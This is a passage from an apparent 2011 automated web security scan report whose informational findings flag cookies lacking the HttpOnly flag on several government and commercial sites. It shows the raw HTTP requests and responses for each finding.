Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAACAAAAAgAAABX3HE4V9xxOAQAAAJ/3HE6Z9xxOAQAAAAEAAACf9xxOFfccTgEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3; path=/; expires=Sat, 10-Jul-2021 01:40:47 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Wed, 13 Jul 2011 01:40:46 GMT
Connection: close

GIF89a.............!.......,...........D..;

7.36. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sdc.state.nj.us
Path:	/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAABAAAAAgAAABX3HE4V9xxOAQAAAAEAAAAV9xxOFfccTgAAAAA-; path=/; expires=Sat, 10-Jul-2021 01:38:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif?&dcsdat=1310521108529&dcssip=nj.gov&dcsuri=/&WT.co_f=173.193.214.243-2429894688.30163197&WT.vtid=173.193.214.243-2429894688.30163197&WT.vtvs=1310521108532&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=The%20Official%20Web%20Site%20for%20The%20State%20of%20New%20Jersey&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x823&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.z_url=/&WT.z_domain=nj.gov&WT.es=nj.gov/&WT.cg_n=example&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.state.nj.us
Proxy-Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:610"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAABAAAAAgAAABX3HE4V9xxOAQAAAAEAAAAV9xxOFfccTgAAAAA-; path=/; expires=Sat, 10-Jul-2021 01:38:29 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Wed, 13 Jul 2011 01:38:28 GMT
Connection: close

GIF89a.............!.......,...........D..;

7.37. http://server.iad.liveperson.net/hc/33511087/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/33511087/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=4932709835118299835; path=/hc/33511087
HumanClickACTIVE=1310522364563; expires=Thu, 14-Jul-2011 01:59:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=knockPage&page=http%3A//www.delaware.gov/apps/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5808447995&scriptVersion=1.1&d=1310522362808&title=Delaware.gov%20--%20Mobile%20Apps%20for%20iPhone%20and%20Android&referrer=http%3A//www.delaware.gov/ HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=2985234093551245539; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522362451

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:59:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=4932709835118299835; path=/hc/33511087
Set-Cookie: HumanClickACTIVE=1310522364563; expires=Thu, 14-Jul-2011 01:59:24 GMT; path=/
Content-Type: image/gif
Last-Modified: Wed, 13 Jul 2011 01:59:24 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;

7.38. http://server.iad.liveperson.net/hc/33511087/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/33511087/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1310522436862; expires=Thu, 14-Jul-2011 02:00:36 GMT; path=/
HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=knockPage&page=http%3A//www.delaware.gov/apps/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=7068719814&scriptVersion=1.1&d=1310522436147&title=Delaware.gov%20--%20Mobile%20Apps%20for%20iPhone%20and%20Android&referrer=http%3A//itunes.apple.com/us/app/delaware-gov/id444422872 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5099524182751471388; LivePersonID=-16101514677756-1310522366:-1:-1:-1:-1; HumanClickSiteContainerID_33511087=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522363550

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:00:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310522436862; expires=Thu, 14-Jul-2011 02:00:36 GMT; path=/
Content-Type: image/gif
Last-Modified: Wed, 13 Jul 2011 02:00:36 GMT
Cache-Control: private
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Content-Length: 34

GIF89aZ............,...........L.;

7.39. http://server.iad.liveperson.net/hc/33511087/x.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/33511087/x.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1310522363490; expires=Thu, 14-Jul-2011 01:59:23 GMT; path=/
HumanClickKEY=4061358983041699324; path=/hc/33511087

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:59:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310522363490; expires=Thu, 14-Jul-2011 01:59:23 GMT; path=/
Set-Cookie: HumanClickKEY=4061358983041699324; path=/hc/33511087
Cache-Control: max-age=900
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 13 Jul 2011 01:59:23 GMT
Content-Length: 33369

var SCRIPT_VERSION = "1.1";

if (typeof(lpNumber) == "undefined")
lpNumber = '33511087';

var lpUseFirstParty = ("true" == "false");
var lpUseSecureCookies = ("true" == "false");
var lpUseSessionC
...[SNIP]...

7.40. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAAPAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAO77HE7u+xxODQAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAADu+xxO7vscTgAAAAA-; path=/; expires=Sat, 10-Jul-2021 01:59:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif?&dcsdat=1310522349692&dcssip=de.gov&dcsuri=/&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Delaware.gov%20--%20The%20Official%20Website%20of%20the%20First%20State&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x823&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=de.gov/&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAAOAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1ODAAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:59:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAAPAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAO77HE7u+xxODQAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAADu+xxO7vscTgAAAAA-; path=/; expires=Sat, 10-Jul-2021 01:59:10 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

7.41. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1310521875602718; path=/; expires=Wed, 20-Jul-11 01:51:15 GMT; domain=.twitter.com
guest_id=v1%3A131052187562584923; domain=.twitter.com; path=/; expires=Fri, 12 Jul 2013 13:51:15 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310521875-90449-3159
ETag: "85527ad242b776a506d5d88b053c21da"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:51:15 GMT
X-Runtime: 0.01211
Content-Type: text/html; charset=utf-8
Content-Length: 50437
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 47f8e2ed085eaed7e4648c027947ab8baa7aa28c
Set-Cookie: k=173.193.214.243.1310521875602718; path=/; expires=Wed, 20-Jul-11 01:51:15 GMT; domain=.twitter.com
Set-Cookie: guest_id=v1%3A131052187562584923; domain=.twitter.com; path=/; expires=Fri, 12 Jul 2013 13:51:15 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKvcMCExAToHaWQiJTBhODMxZjBmYjMyMjIx%250AMzFlNTk1NDRhNDIzZmVhYTgwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--53400218b1904fe1c703d7d2b21d9ca4aa243e52; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...

7.42. http://www.facebook.com/NewJerseyLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/NewJerseyLottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=pn98H; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.43. http://www.facebook.com/feeds/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/feeds/page.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=r-8ny; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feeds/page.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private, no-cache, no-store, must-revalidate
Content-type: text
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Tue, 12 Jul 2011 18:51:31 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=r-8ny; path=/; domain=.facebook.com
X-FB-Server: 10.54.49.57
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 1443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" id="facebook"><head><title>Error</title
...[SNIP]...

7.44. http://www.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=19674e168110c698:U=17ea5243225a615b:FF=0:TM=1308589662:LM=1310521893:S=z4pmIJAj-KHt9ejB; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.45. http://www.google.com/reviews/scripts/annotations_bootstrap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/reviews/scripts/annotations_bootstrap.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521893:S=5yFQy_JU0BcdCdTy; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reviews/scripts/annotations_bootstrap.js HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.46. http://www.governor.ny.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.governor.ny.gov
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

webpool=webpool_web01; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.governor.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:34 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 01:06:21 GMT
ETag: "23d91b5-8921-4a7e906413d40"
Accept-Ranges: bytes
Content-Length: 35105
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<me
...[SNIP]...

7.47. http://www.iloveny.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iloveny.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

.ILNY_AUTH=uu2GJeV09wyGQ6aKghViELP9N9Dm8hBnLsRRZ2GAG/fsaDejtDcfVW2M/fqVMdr2uAyxABndZtAy4ZnoZfLalSWT1/zyZMiJhGMHBviCGrddJMhVv5SnPrdb61MOKmiL4PjIZbT58V9/+gxlYTPHZ7yjq2xkG54L2nIaLPAHpsjdo469gG514Xi7B7i0wEB8GfR2Fz+P7VN9wLZ8dVkqiglp3tyNiQP96vRWZb/Qo1uSbo2Y9j8/7pdWILKC3zWhgf0oNcVbu71K1ZxM8kp/d16xMFGCq4Zbo1v6p0+eH2gKPvycUOCiM+MhD0EtymLNkSNnJcNHePxLugEelU5Dd0B4T+YRO6Ae9Yft8Dh919ZDp/VLj47hojdjxMpUGh97FPVtcr2J6z+5OGkuMFY8xBn0dhc/j+1T9Jj7faoCA3xi/xApnGc4r51R7EQro889/TpWey+c0aB0fXwvpuFsR7mXIoJ30owZ0yVV39DPO+KW26DuRndG1Td9i9o9LlIRnAKVCRGAKBn/l9lP37McD9zxnwWjwDYCvGl2pMn8tYz17c7yZ+ZWT3+sTJAG9JCy/5fZT9+zHA/KvqWBbVOIddlQ1mLRKaNpN32L2j0uUhFO4HJj72uJONlQ1mLRKaNpa35ox231RPbJMqqETDfFxtjTF9BaLMFWyEKfT5D5F2X3GARRWbeuBg==; expires=Wed, 13-Jul-2011 03:21:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.iloveny.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 78528
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=hlgm1aj0dc4o1s55anwpet45; path=/; HttpOnly
Set-Cookie: .ILNY_AUTH=uu2GJeV09wyGQ6aKghViELP9N9Dm8hBnLsRRZ2GAG/fsaDejtDcfVW2M/fqVMdr2uAyxABndZtAy4ZnoZfLalSWT1/zyZMiJhGMHBviCGrddJMhVv5SnPrdb61MOKmiL4PjIZbT58V9/+gxlYTPHZ7yjq2xkG54L2nIaLPAHpsjdo469gG514Xi7B7i0wEB8GfR2Fz+P7VN9wLZ8dVkqiglp3tyNiQP96vRWZb/Qo1uSbo2Y9j8/7pdWILKC3zWhgf0oNcVbu71K1ZxM8kp/d16xMFGCq4Zbo1v6p0+eH2gKPvycUOCiM+MhD0EtymLNkSNnJcNHePxLugEelU5Dd0B4T+YRO6Ae9Yft8Dh919ZDp/VLj47hojdjxMpUGh97FPVtcr2J6z+5OGkuMFY8xBn0dhc/j+1T9Jj7faoCA3xi/xApnGc4r51R7EQro889/TpWey+c0aB0fXwvpuFsR7mXIoJ30owZ0yVV39DPO+KW26DuRndG1Td9i9o9LlIRnAKVCRGAKBn/l9lP37McD9zxnwWjwDYCvGl2pMn8tYz17c7yZ+ZWT3+sTJAG9JCy/5fZT9+zHA/KvqWBbVOIddlQ1mLRKaNpN32L2j0uUhFO4HJj72uJONlQ1mLRKaNpa35ox231RPbJMqqETDfFxtjTF9BaLMFWyEKfT5D5F2X3GARRWbeuBg==; expires=Wed, 13-Jul-2011 03:21:37 GMT; path=/
Date: Wed, 13 Jul 2011 01:51:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">

<head id="He
...[SNIP]...

7.48. http://www.louise.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.louise.house.gov
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ce12a43d31101321362cf131b5cb4bf5=2m8kqb9hvsqs9ciisr3ds8m881; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.louise.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.49. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.50. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.51. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.52. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.54. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.55. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.56. http://www.nylottery.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nylottery.org
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

